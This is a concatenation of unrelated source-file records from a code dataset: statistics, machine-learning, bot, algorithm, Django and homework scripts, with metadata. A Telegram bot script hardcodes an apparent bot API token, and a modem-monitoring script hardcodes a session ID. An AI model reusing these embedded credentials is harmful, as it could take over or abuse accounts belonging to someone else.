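    mask_blue = cv2.inRange(hsv, np.array([110, 50, 50]), np.array([130, 255, 255]))
    mask_green = cv2.inRange(hsv, np.array([50, 100, 100]), np.array([70, 255, 255]))
    # Union of the two binary masks, passed through the mask= keyword.
    combined = cv2.bitwise_or(mask_blue, mask_green)
    return cv2.bitwise_and(frame, frame, mask=combined)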
moduleauthor:: Chris Fournier \n'''\n#===============================================================================\n# Copyright (c) 2011-2012, Chris Fournier\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the author nor the names of its contributors may\n# be used to endorse or promote products derived from this software\n# without specific prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#===============================================================================\nfrom decimal import Decimal\nfrom . import actual_agreement\nfrom .. import compute_mean, compute_mean_values, create_tsv_rows\nfrom ..data import load_file\nfrom ..data.TSV import write_tsv\nfrom ..data.Display import render_value, render_mean_values\n\n\ndef scotts_pi(items_masses, return_parts=False):\n '''\n Calculates Scott's Pi, originally proposed in [Scott1955]_, for\n segmentations. Adapted in [FournierInkpen2012]_ from the formulations\n provided in [Hearst1997]_ and [ArtsteinPoesio2008]_'s formulation for\n expected agreement:\n \n .. math::\n \\\\text{A}^\\pi_e = \\sum_{k \\in K} \\\\big(\\\\text{P}^\\pi_e(k)\\\\big)^2\n \n .. math::\n \\\\text{P}^\\pi_e(\\\\text{seg}_t) = \n \\\\frac{\n \\sum_{c \\in C}\\sum_{i \\in I}|\\\\text{boundaries}(t, s_{ic})|\n }{\n \\\\textbf{c} \\cdot \\sum_{i \\in I} \\\\big( \\\\text{mass}(i) - 1 \\\\big)\n }\n \n :param items_masses: Segmentation masses for a collection of items where \\\n each item is multiply coded (all coders code all items).\n :param return_parts: If true, return the numerator and denominator\n :type item_masses: dict\n :type return_parts: bool\n \n :returns: Scott's Pi\n :rtype: :class:`decimal.Decimal`\n \n .. seealso:: :func:`segeval.agreement.actual_agreement` for an example of\\\n ``items_masses``.\n \n .. 
note:: Applicable for only 2 coders.\n '''\n # Check that there are no more than 2 coders\n if len([True for coder_segs in items_masses.values() \\\n if len(coder_segs.keys()) > 2]) > 0:\n raise Exception('More than 2 coders specified.')\n # Check that there are an identical number of items\n num_items = len(items_masses.values()[0].keys())\n if len([True for coder_segs in items_masses.values() \\\n if len(coder_segs.values()) != num_items]) > 0:\n raise Exception('Unequal number of items contained.')\n # Return\n return fleiss_pi(items_masses, return_parts)\n\n\ndef fleiss_pi(items_masses, return_parts=False):\n '''\n Calculates Fleiss' Pi (or multi-Pi), originally proposed in [Fleiss1971]_,\n for segmentations (and described in [SiegelCastellan1988]_ as K).\n Adapted from the formulations\n provided in [Hearst1997]_ (p. 53) and [ArtsteinPoesio2008]_'s formulation\n for expected agreement:\n \n .. math::\n \\\\text{A}^{\\pi^*}_e = \\sum_{k \\in K} \\\\big(\\\\text{P}^\\pi_e(k)\\\\big)^2\n \n :param items_masses: Segmentation masses for a collection of items where \\\n each item is multiply coded (all coders code all items).\n :param return_parts: If true, return the numerator and denominator.\n :type items_masses: dict\n :type return_parts: bool\n \n :returns: Fleiss's Pi\n :rtype: :class:`decimal.Decimal`\n \n .. seealso:: :func:`segeval.agreement.actual_agreement` for an example of\\\n ``items_masses``.\n \n .. note:: Applicable for more than 2 coders.\n '''\n # pylint: disable=C0103,R0914\n # Check that there are an equal number of items for each coder\n num_items = len(items_masses.values()[0].keys())\n if len([True for coder_segs in items_masses.values() \\\n if len(coder_segs.values()) != num_items]) > 0:\n raise Exception('Unequal number of items contained.')\n # Initialize totals\n unmoved_masses, total_masses, coders_boundaries_totalboundaries = \\\n actual_agreement(items_masses)\n # Calculate Aa\n A_a = Decimal(sum(unmoved_masses)) / sum(total_masses)\n # Calculate Ae\n p_e_segs = list()\n for boundaries_info in coders_boundaries_totalboundaries.values():\n for item in boundaries_info:\n boundaries, total_boundaries = item\n p_e_seg = boundaries / total_boundaries\n p_e_segs.append(p_e_seg)\n # Calculate P_e_seg\n P_e_seg = Decimal(sum(p_e_segs)) / len(p_e_segs)\n A_e = (P_e_seg ** 2)\n # Calculate pi\n pi = (A_a - A_e) / (Decimal('1.0') - A_e)\n # Return\n if return_parts:\n return A_a, A_e\n else:\n return pi\n\n\ndef mean_fleiss_pi(dataset_masses):\n '''\n Calculate mean segmentation Fleiss' Pi.\n \n ..
seealso:: :func:`fleiss_pi`, :func:`segeval.compute_mean`\n \n :param dataset_masses: Segmentation mass dataset (including multiple \\\n codings).\n :type dataset_masses: dict\n \n :returns: Mean, standard deviation, and variance.\n :rtype: :class:`decimal.Decimal`, :class:`decimal.Decimal`, :class:`decimal.Decimal`\n '''\n return compute_mean(dataset_masses, fleiss_pi)\n\n\nOUTPUT_NAME = 'S-based Fleiss\\' Multi Pi'\nSHORT_NAME = 'Pi*_s'\nSHORT_NAME_MEAN = 'Mean %s' % SHORT_NAME\n\n\ndef values_pi(dataset_masses):\n '''\n Produces a TSV for this metric\n '''\n header = list([SHORT_NAME])\n values = compute_mean_values(dataset_masses, fleiss_pi)\n return create_tsv_rows(header, values)\n\n\ndef parse(args):\n '''\n Parse this module's metric arguments and perform requested actions.\n '''\n output = None\n values, is_file = load_file(args)\n # Is a TSV requested?\n if args['output'] != None:\n # Create a TSV\n output_file = args['output'][0]\n header, rows = values_pi(values)\n write_tsv(output_file, header, rows)\n else:\n # Create a string to output\n if not args['output'] and is_file:\n # Render for one item\n output = render_value(SHORT_NAME, str(fleiss_pi(values)))\n else:\n # Render for one or more items\n mean, std, var, stderr = mean_fleiss_pi(values)\n output = render_mean_values(SHORT_NAME_MEAN, mean, std, var, stderr)\n # Return\n return output\n\n\ndef create_parser(subparsers):\n '''\n Setup a command line parser for this module's metric.\n '''\n from ..data import parser_add_file_support\n parser = subparsers.add_parser('pi',\n help=OUTPUT_NAME)\n parser_add_file_support(parser)\n parser.set_defaults(func=parse)\n\n","sub_path":"src/python/main/segeval/agreement/Pi.py","file_name":"Pi.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"142220922","text":"from unittest import TestCase\r\nfrom random import randint\r\nfrom main import *\r\nfrom os import system\r\n\r\n#Класс дирижера:\r\nclass Conductor:\r\n conductors_number = 0 #Счетчик для id\r\n def __init__(self, Orchestra_id=None, Name=\"\", Sername=\"\", Middle_name=\"\", Salary=None, Orchestra_name=\"\"):\r\n self.conductor_id = Conductor.conductors_number\r\n Conductor.conductors_number+=1\r\n self.orchestra_id = Orchestra_id\r\n self.name = Name\r\n self.sername = Sername\r\n self.middle_name = Middle_name\r\n self.salary = Salary\r\n\r\n #Краткий вывод экземпляра:\r\n def show(self, Logic=True):\r\n line = self.name + \" \" + self.sername\r\n if Logic == True: print(line + \" (id = \" + str(self.conductor_id) + \", оркестр_id = \" + str(self.orchestra_id) + \")\", end=\"\")\r\n return line\r\n\r\n#Класс оркестра:\r\nclass Orchestra:\r\n orchestras_number = 0 #Счетчик для id\r\n def __init__(self, Name=\"\"):\r\n self.orchestra_id = Orchestra.orchestras_number\r\n Orchestra.orchestras_number+=1\r\n self.name = Name\r\n \r\n #Краткий вывод экземпляра:\r\n def show(self, Logic=True):\r\n line = \"\\\"\" +self.name + \"\\\"\"\r\n if Logic == True: print(line + \" (id = \" + str(self.orchestra_id) + \")\", end=\"\")\r\n return line\r\n\r\n#Класс дирижеров оркестров (для реализации связей и хранения данных):\r\nclass Storage:\r\n orchestras_dict = {} #Словарь относительно оркестров\r\n orchestras_list = [] #Cписки оркестров и дирижеров\r\n conductors_list = [] #\r\n\r\n def __init__(self):\r\n self.orchestras_dict = {}\r\n self.orchestras_list = []\r\n self.conductors_list = []\r\n Orchestra.orchestras_number = 0\r\n 
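To make the Pi formula from the segeval record above concrete, here is a tiny worked example with invented agreement values (the record computes expected agreement as the square of the per-boundary chance rate):

from decimal import Decimal

A_a = Decimal('0.85')        # actual agreement (hypothetical value)
P_e_seg = Decimal('0.30')    # chance rate per boundary (hypothetical value)
A_e = P_e_seg ** 2           # expected agreement = 0.09, as in fleiss_pi above
pi = (A_a - A_e) / (Decimal('1.0') - A_e)
print(pi)                    # ~0.835, i.e. agreement well above chance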
Conductor.conductors_number = 0\r\n\r\n #Добавление новых дирижеров:\r\n def add_conductor(self, Conductors, Orchestra_id):\r\n conductors_of_orchestra = self.orchestras_dict.get(Orchestra_id, None) #Поиск соответсвующего оркестра\r\n if conductors_of_orchestra != None: \r\n if isinstance(Conductors, list) == True: #Если такой имеется и соблюден синтаксис добавляем необходимых дирижеров\r\n for i in range(len(Conductors)): conductors_of_orchestra.append(Conductors[i].conductor_id) #в лист связей\r\n self.conductors_list.extend(Conductors) #в хранилище дирижеров\r\n else: print(\"Ошибка синтаксиса!\")\r\n else: print(\"Отсутсвует данный оркестр!\")\r\n\r\n #Добавление новых оркестров:\r\n def add_orchestra(self, Orchestras):\r\n if isinstance(Orchestras, list) == True:\r\n for i in range(len(Orchestras)): \r\n self.orchestras_dict[Orchestras[i].orchestra_id] = [] #в лист связей\r\n self.orchestras_list.extend(Orchestras) #в хранилище оркестров\r\n else: print(\"Ошибка синтаксиса!\")\r\n \r\n #Возвращение дирижера по id:\r\n def return_conductor_by_id(self, Conductor_id): \r\n try: return self.conductors_list[Conductor_id]\r\n except: return None\r\n\r\n #Возвращение id оркестра по его имени:\r\n def find_orcestra_by_name(Storage, Name):\r\n for i in range(len(Storage.orchestras_list)):\r\n if Storage.orchestras_list[i].name == Name: return i\r\n return None\r\n\r\n #Cоздание отсортированного по возрастанию списка средних зарплат в оркестрах:\r\n def count_average_salary(self):\r\n sallary_range_list = []\r\n for i in range(len(self.orchestras_dict)):\r\n summ = 0\r\n for i2 in range(len(self.orchestras_dict[i])): \r\n sallary = self.conductors_list[self.orchestras_dict[i][i2]].salary\r\n if sallary!= None:\r\n summ += sallary #Сумма месячных зарплат в этом оркестре\r\n length = len(self.orchestras_dict[i])\r\n if length>0:\r\n Averange = round(summ/length, 2) #Находим среднее\r\n else:\r\n Averange = 0\r\n sallary_range_list.append([Averange, i]) #Добавляем его соответсвенно с id оркестра\r\n sallary_range_list.sort()\r\n return sallary_range_list\r\n\r\n#================ТЕСТИРОВАНИЕ================\r\n#Класс, создающий случайные данные для испытаний:\r\nclass Init_Random_Storage(Storage):\r\n def init(self, number_conductores, number_orchestras, length_a, length_b, salary_a, salary_b):\r\n for i in range(number_orchestras):\r\n self.add_orchestra([Orchestra(self.get_rand_name(length_a, length_b))])\r\n\r\n for i in range(number_conductores):\r\n R = randint(0, number_orchestras-1)\r\n self.add_conductor([Conductor(R, self.get_rand_name(length_a, length_b), self.get_rand_name(length_a, length_b),\r\n self.get_rand_name(length_a, length_b), randint(salary_a, salary_b))], R)\r\n\r\n def get_rand_name(self, legth_a,length_b):\r\n Name = \"\"\r\n letters = \"абвгдежзийкльмнопрстуфцчшщъыьэюяАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\"\r\n length = randint(legth_a, length_b)\r\n for i in range(length):\r\n Name += letters[randint(0, 63)]\r\n return Name\r\n\r\n#Проверка функции подсчета среднего заработка:\r\nclass Test_of_count_average_salary(TestCase):\r\n def test_check(self, times=15):\r\n print(\"\\nПроверка функции подсчета среднего заработка: \", end=\"\")\r\n for i in range(times):\r\n S = Init_Random_Storage()\r\n S.init(10, 10, 10, 15, 10000, 1000000)\r\n awarange_salary = S.count_average_salary()\r\n\r\n #Проверка порядка:\r\n m=0\r\n for i in awarange_salary:\r\n Test_of_count_average_salary.assertTrue(self, i[0]>=m)\r\n a=m\r\n\r\n #Проверка наличия:\r\n for i in range(0, 
len(S.orchestras_dict)-1):\r\n summ = 0;\r\n for i2 in range(len(S.orchestras_dict[i])): \r\n salary = S.conductors_list[S.orchestras_dict[i][i2]].salary\r\n if salary != None:\r\n summ += salary\r\n if len(S.orchestras_dict[i])>0: \r\n awarange = round(summ/len(S.orchestras_dict[i]), 2)\r\n else:\r\n awarange = 0\r\n Test_of_count_average_salary.assertIn(self, [awarange, i], awarange_salary) \r\n print(\"Оk\",end=\"\")\r\n\r\n#Проверка функции вывода среднего заработка:\r\nclass Test_of_show_middle_salary_list(TestCase):\r\n def test_check(self):\r\n print(\"\\nПроверка функции вывода среднего заработка: \", end=\"\")\r\n S = Init_Random_Storage()\r\n S.init(10, 10, 10, 15, 10000, 1000000)\r\n average_salaries_list = S.count_average_salary() #Считается, что эта функция уже проверена.\r\n num=0\r\n for i in show_middle_salary_list(S.orchestras_list, average_salaries_list):\r\n Test_of_show_middle_salary_list.assertTrue(self, i[\"срзп\"] == average_salaries_list[num][0])\r\n Test_of_show_middle_salary_list.assertTrue(self, i[\"id\"] == \"(id = \" + str(average_salaries_list[num][1]) + \")\")\r\n Test_of_show_middle_salary_list.assertTrue(self, i[\"название\"] == S.orchestras_list[average_salaries_list[num][1]].show(False))\r\n num+=1\r\n print(\"Ok\", end=\"\")\r\n\r\n#Проверка функции, возвращающей дирижеров из списка:\r\nclass Test_of_return_conductors(TestCase):\r\n def test_check(self):\r\n print(\"\\nПроверка функции, возвращающей дирижеров из списка: \", end=\"\")\r\n S = Init_Random_Storage()\r\n S.init(10, 10, 10, 15, 10000, 1000000)\r\n ids_list = []\r\n\r\n #Получаем все id дирижеров, проходя по списку:\r\n for i in S.conductors_list:\r\n ids_list.append(i.conductor_id)\r\n\r\n #Проверяем их наличие:\r\n for i in return_conductors(S, ids_list):\r\n Test_of_return_conductors.assertIn(self, i, S.conductors_list)\r\n print(\"Оk\", end=\"\")\r\n\r\n#Проверка функции поиска слова в оркестре:\r\nclass Test_of_word_in_orchestra_search(TestCase):\r\n def test_check(self, times=100):\r\n print(\"\\nПроверка функции поиска слова в оркестре: \", end=\"\")\r\n for i in range(times):\r\n S = Init_Random_Storage()\r\n S.init(10, 10, 5, 8, 10000, 1000000)\r\n word = S.get_rand_name(1, 1)\r\n #Проверка правильности:\r\n num1 = 0\r\n for i in word_in_orchestra_search(S.orchestras_list, S.conductors_list, S.orchestras_dict, word):\r\n Test_of_word_in_orchestra_search.assertIn(self, word, i.name)\r\n num1+=1\r\n\r\n #Проверка того, что найдено все:\r\n num2 = 0\r\n for i in range(len(S.orchestras_list)):\r\n if word in S.orchestras_list[i].name:\r\n num2+=1\r\n Test_of_word_in_orchestra_search.assertTrue(self, num1==num2)\r\n print(\"Оk\", end=\"\")\r\n\r\n#Проверка функции поиска дирижера по первой букве:\r\nclass Test_of_check_conductures_first_letter(TestCase):\r\n def test_check(self, times=10):\r\n print(\"\\nПроверка функции поиска дирижера по первой букве: \", end=\"\")\r\n for i in range(times):\r\n S = Init_Random_Storage()\r\n S.init(10, 10, 10, 15, 10000, 1000000)\r\n letter = S.get_rand_name(1, 1)\r\n\r\n #Проверка правильности:\r\n num1 = 0\r\n for i in check_conductures_first_letter(S.conductors_list, S.orchestras_list, letter):\r\n Test_of_check_conductures_first_letter.assertTrue(self, i[\"фамилия\"][0]==letter)\r\n num1+=1\r\n\r\n #Проверка того, что найдено все:\r\n num2 = 0\r\n for i in S.conductors_list:\r\n if i.sername[0] == letter: \r\n num2 += 1\r\n Test_of_check_conductures_first_letter.assertTrue(self, num1==num2)\r\n print(\"Ok\", 
end=\"\")","sub_path":"Rk2/Rk2_Classes.py","file_name":"Rk2_Classes.py","file_ext":"py","file_size_in_byte":11310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"83522380","text":"import re\n\nlog_file = \"./logs/retinanet_shapes.log\"\nregex_ = \"[0-9]+, [0-9]+, [0-9]+, [0-9]+\"\n\nFOR_ONE_IMG = True\n\nwith open(log_file, 'r') as f:\n logs = f.readlines()\n\n\ndef estimate_act_map_sizes(logs, DATA):\n tensor_els = 0\n how_many_720 = 0\n\n for idx, log in enumerate(logs):\n\n matches = re.findall(regex_, log)\n\n if len(matches)>0:\n match = matches[0]\n else:\n continue\n\n match = [int(m) for m in match.split(',')]\n print(match)\n\n n, c, h, w = match\n\n if c==720:\n how_many_720 += 1\n if DATA==\"LVIS\":\n c *= 15.375\n\n if FOR_ONE_IMG:\n n = 1\n\n tensor_size = int(n*c*h*w)\n\n tensor_els += tensor_size\n\n\n return (tensor_els*4/1000000)\n #print(\"Activations take: {} MBs\".format(tensor_els*4/1000000))\n\nprint(\"COCO: {:.2f} MBs.\".format(estimate_act_map_sizes(logs, DATA=\"COCO\")))\nprint(\"LVIS: {:.2f} MBs.\".format(estimate_act_map_sizes(logs, DATA=\"LVIS\")))\n\n\n","sub_path":"sandbox/shapes/v0/estimate_act_map_sizes.py","file_name":"estimate_act_map_sizes.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"623146295","text":"import tensorflow.compat.v1 as tf\nimport mesh_tensorflow as mtf\n\ndef comparative_paired_rewards_loss(paired_rewards, ans_pair_dim):\n \"\"\"\n Loss function for the comparative reward model from Learning to Summarize\n from Human Feedback (Stiennon et al.).\n\n Parameters\n ----------\n paired_rewards : mtf.Tensor\n Output of the reward model for two responses to the same prompt (e.g.\n two summaries of the same text). The second value along the\n `ans_pair_dim` axis is assumed to correspond to the human preferred\n response. Shape should be [ans_pair_dim, batch_dim].\n ans_pair_dim : mtf.Dimension\n Dimension of the answer pair. 
ans_pair_dim.size = 2\n\n Returns\n -------\n loss : mtf.Tensor\n Aggregative mini-batch loss with shape [].\n \"\"\"\n tf_diff_filter = tf.convert_to_tensor([-1, 1], dtype=paired_rewards.dtype)\n diff_filter = mtf.import_tf_tensor(\n paired_rewards.mesh,\n tf_diff_filter,\n shape=[ans_pair_dim]\n )\n diff = mtf.reduce_sum(paired_rewards * diff_filter, reduced_dim=ans_pair_dim)\n return mtf.reduce_mean(-mtf.log(mtf.sigmoid(diff)))\n","sub_path":"reward/comparative/loss_fn.py","file_name":"loss_fn.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"608247499","text":"# coding: utf-8\nfrom __future__ import absolute_import, unicode_literals, division, print_function\n\n\nimport requests\nURL = 'https://api.telegram.org/bot'\nTOKEN = '419867054:AAHDaorcrkdV_4IyAb2PJWu4gftAlmOXW2o'\n# data = {'offset': offset 1, 'limit': 0, 'timeout': 0}\nwhile True:\n # message_data = { # build the payload for sending a message\n # 'chat_id': update['message']['chat']['id'], # where to send the message\n # 'text': \"I'm bot\", # the message text to send\n # 'reply_to_message_id': update['message']['message_id'], # if set, the bot sends the message as a reply\n # 'parse_mode': 'HTML' # text formatting is described below\n # }\n ans = requests.post(URL+TOKEN+'/getUpdates',) # request to fetch new updates\n print(ans.json())\n\n\n f = {u'ok': True, u'result': [{u'message': {u'date': 1511383949, u'text': u'hduedhue', u'from': {u'username': u'uladzislaugr', u'first_name': u'Vladislav', u'last_name': u'Graevkiy', u'is_bot': False, u'language_code': u'en', u'id': 161222966}, u'message_id': 14, u'chat': {u'username': u'uladzislaugr', u'first_name': u'Vladislav', u'last_name': u'Graevkiy', u'type': u'private', u'id': 161222966}}, u'update_id': 365666766}]}\n\n message_data = { # build the payload for sending a message\n 'chat_id': f['result'][0]['message']['chat']['id'], # where to send the message\n 'text': \"I'm bot\", # the message text to send\n # 'reply_to_message_id': f['result'][0]['message']['message_id'], # if set, the bot sends the message as a reply\n 'parse_mode': 'HTML' # text formatting is described below\n }\n try:\n request = requests.post(URL+TOKEN+'/sendMessage', data=message_data) # request to send the message\n print(request.json())\n except:\n print('Send message error')\n","sub_path":"housebot/housemain.py","file_name":"housemain.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"417884454","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 14 16:56:48 2018\n\n@author: owen\n\"\"\"\n\n# Merge two given sorted integer array A and B into a new sorted integer array.\n\n# Merge into a new array\n# If one array is very large, binary-search the smaller array's elements into it\n\nclass Solution:\n \"\"\"\n @param A: sorted integer array A\n @param B: sorted integer array B\n @return: A new sorted integer array\n \"\"\"\n def mergeSortedArray(self, A, B):\n # write your code here\n # time O(m + n)\n m, n = len(A), len(B) # m ~ n\n i, j = 0, 0 \n res = []\n while i < m and j < n:\n if A[i] < B[j]:\n res.append(A[i])\n i += 1\n else:\n res.append(B[j])\n j += 1\n \n while i < m: # copy over whatever remains of this array\n res.append(A[i])\n i += 1\n \n while j < n:\n res.append(B[j])\n j += 1\n \n return res\n \n \nfrom bisect import bisect_right\nclass Solution:\n \"\"\"\n @param A: sorted integer array A\n @param B: sorted integer array B\n
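The mesh-tensorflow loss in the loss_fn.py record above boils down to -log(sigmoid(r_preferred - r_other)) averaged over the batch; a dependency-light NumPy sketch of the same quantity (illustrative only, not the project's API):

import numpy as np

def paired_reward_loss(rewards):
    # rewards has shape (2, batch); row 1 holds the human-preferred response,
    # mirroring the [-1, 1] difference filter used in the record above.
    diff = rewards[1] - rewards[0]
    # -log(sigmoid(diff)) computed stably as softplus(-diff).
    return np.mean(np.logaddexp(0.0, -diff))

print(paired_reward_loss(np.array([[0.2, -0.5], [1.0, 0.3]])))  # small when row 1 wins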
@return: A new sorted integer array\n \"\"\"\n def mergeSortedArray(self, A, B):\n # write your code here\n # if one array is very large and the other is very small, time O(n + m log n), space O(1), can be better than directly comparing two elements\n m, n = len(A), len(B)\n if m > n:\n return self.mergeSortedArray(B, A)\n \n start = 0 \n res = []\n for x in A: # number of A is much smaller than that of B\n pos = bisect_right(B, x) # find the index > x for inserting x\n res += B[start: pos] # directly copy from B\n res.append(x) # add element of A\n start = pos\n \n res += B[start:] \n return res\n\n\n","sub_path":"Merge Two Sorted Array.py","file_name":"Merge Two Sorted Array.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"273928352","text":"import requests\nfrom datetime import datetime\nimport time\nimport xml.dom.minidom as xml\nimport json\n\n\nURL = 'http://192.168.8.1/'\nSTATUS_API = 'api/monitoring/status'\nTRAFFIC_API = 'api/monitoring/traffic-statistics'\nSESSION_ID = 'd3roljPTGZmVu1pfF00ckSXih4JZNjxtM6eDhvCFhHPB6XtTju33Bifi0TN1imX1TZ6Kf1YaqHt3x1D3JgSgGTVIZPeRA8XmPXsR0BMy00Tk0rJrqvDxw0pJZIQ0aANb'\n\nif __name__ == '__main__':\n s = requests.Session()\n s.headers.update({})\n s.cookies.update({'SessionID': SESSION_ID})\n\n while True:\n resp = s.get(URL + TRAFFIC_API)\n \n if resp.ok:\n \n doc = xml.parseString(resp.text)\n\n total_upload = int(doc.getElementsByTagName('TotalUpload')[0].firstChild.nodeValue)\n total_download = int(doc.getElementsByTagName('TotalDownload')[0].firstChild.nodeValue)\n\n print(datetime.now().strftime('%I:%M:%S%p'))\n if len(str(total_download)) >= 7:\n ttotal_download = total_download/1024/1024\n ttotal_upload = total_upload/1024/1024\n print(f'Total Upload: {ttotal_upload:.2f}MB\\nTotal Download: {ttotal_download:.2f}MB')\n elif len(str(total_download)) >= 4: \n ttotal_download = total_download/1024\n ttotal_upload = total_upload/1024\n print(f'Total Upload: {ttotal_upload:.2f}KB\\nTotal Download: {ttotal_download:.2f}KB')\n else:\n print(f'Total Upload: {total_upload} byte\\nTotal Download: {total_download} byte')\n \n with open('traffic_stat.log', 'at+') as f:\n f.write(f\"{datetime.now()}:{total_upload}:{total_download}\\n\")\n else:\n print(\"Please Change Session ID\")\n SESSION_ID = input()\n continue\n print('*'*64)\n time.sleep(60)\n\n\n","sub_path":"Requests/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439158668","text":"import requests\n\n\nclass URLShortener:\n def __init__(self, logger):\n self.logger = logger\n\n self.api_01 = 'https://cleanuri.com/api/v1/shorten'\n self.api_02 = 'https://rel.ink/api/links/'\n\n def shorten_url(self, url):\n data = {\n 'url': url\n }\n\n response = requests.post(self.api_01, data=data)\n\n if response.status_code == 200:\n self.logger.info(response.json())\n return response.json()['result_url']\n\n self.logger.error(response.json())\n response = requests.post(self.api_02, json=data)\n\n if response.status_code == 201:\n self.logger.info(response.json())\n return 'https://rel.ink/'.format(response['hashid'])\n\n self.logger.error(response.json())\n\n return None\n","sub_path":"tema3/url_shortener.py","file_name":"url_shortener.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
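For the merge record above, the standard library already offers the same O(m + n) interleaving of sorted inputs; a short sketch:

import heapq

A = [1, 4, 9]
B = [2, 3, 10, 11]
# heapq.merge consumes already-sorted iterables lazily, like the two-pointer loop.
print(list(heapq.merge(A, B)))  # [1, 2, 3, 4, 9, 10, 11]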
+{"seq_id":"566670156","text":"strsample = \"\"\"\r\n\r\nWhen you are old and grey and full of sleep, \r\nAnd nodding by the fire,take down this book,\r\nAnd slowly read,and dream of the soft look.\r\nYour eyes had once,and of their shadows deep; \r\nHow many loved your moments of glad grace,\r\nAnd loved your beauty with love false or true,\r\nBut one man loved the pilgrim Soul in you,\r\nAnd loved the sorrows of your changing face; \r\nAnd bending down beside the glowing bars,\r\nMurmur,a little sadly,how Love fled ,\r\nAnd paced upon the mountains overhead ,\r\nAnd hid his face amid a crowd of stars.\r\n\r\n\"\"\"\r\n#编制程序,统计26个字母出现的次数,并按照次数由高到低将字母排序\r\n#注:大写和小写算一个字符,如H和h算一个,统计在一起\r\n# 本题的输出应为:\r\n'''\r\ne 43\r\no 43\r\na 35\r\nd 35\r\nn 30\r\nr 22\r\nl 22\r\ns 19\r\nt 19\r\nh 18\r\ni 17\r\nu 15\r\ny 13\r\nf 13\r\nw 11\r\ng 10\r\nm 10\r\nb 7\r\nc 7\r\nv 7\r\np 5\r\nk 3'''\r\n\r\nalpha = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\ncount = []\r\n##请将代码写在下面\r\ndef cnt(text:str):\r\n text = text.lower()\r\n for i in range(26):\r\n count.append(0)\r\n for x in text:\r\n if x == alpha[i]:\r\n count[i] += 1\r\n for i in range(25):\r\n for j in range(25):\r\n if count[j] < count[j+1]:\r\n count[j], count[j+1] = count[j+1], count[j]\r\n alpha[j], alpha[j+1] = alpha[j+1], alpha[j]\r\n for i in range(26):\r\n if count[i] != 0:\r\n print(alpha[i], count[i])\r\n \r\ncnt(strsample)\r\n\r\n\r\n","sub_path":"Homework/Midterm/0000000_02.py","file_name":"0000000_02.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"137314859","text":"from django.urls import path\nfrom studentApi import views\n\nurlpatterns = [\n path(\"students/\", views.StudentList.as_view()),\n path(\"students/\", views.StudentDetail.as_view()),\n path(\"createStudent/\", views.CreateStudent.as_view()),\n path(\"updateStudent/\", views.UpdateStudent.as_view()),\n path(\"deleteStudent/\", views.DeleteStudent.as_view())\n]","sub_path":"studentApi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"644868563","text":"from ex06_cliente import Cliente\r\nfrom ex06 import ContaCorrente\r\n\r\nclass Programa:\r\n \r\n def __init__(self):\r\n self.contaCorrente = ContaCorrente(Cliente, )\r\n\r\n def main(self):\r\n\r\n terminar = False\r\n\r\n while not terminar:\r\n comando = input('Digite \"1\" para verificar o saldo atual da conta, \"2\" para depositar, \"3\" para sacar, \"4\" para transferir e \"0\" para sair:\\n')\r\n comando = int(comando)\r\n\r\n if comando == 1: self.contaCorrente.saldo_final()\r\n elif comando == 2: self.contaCorrente.deposito()\r\n elif comando == 3: self.contaCorrente.saque()\r\n elif comando == 4: self.contaCorrente.transferencia()\r\n elif comando == 0: terminar = True\r\n else: print('comando 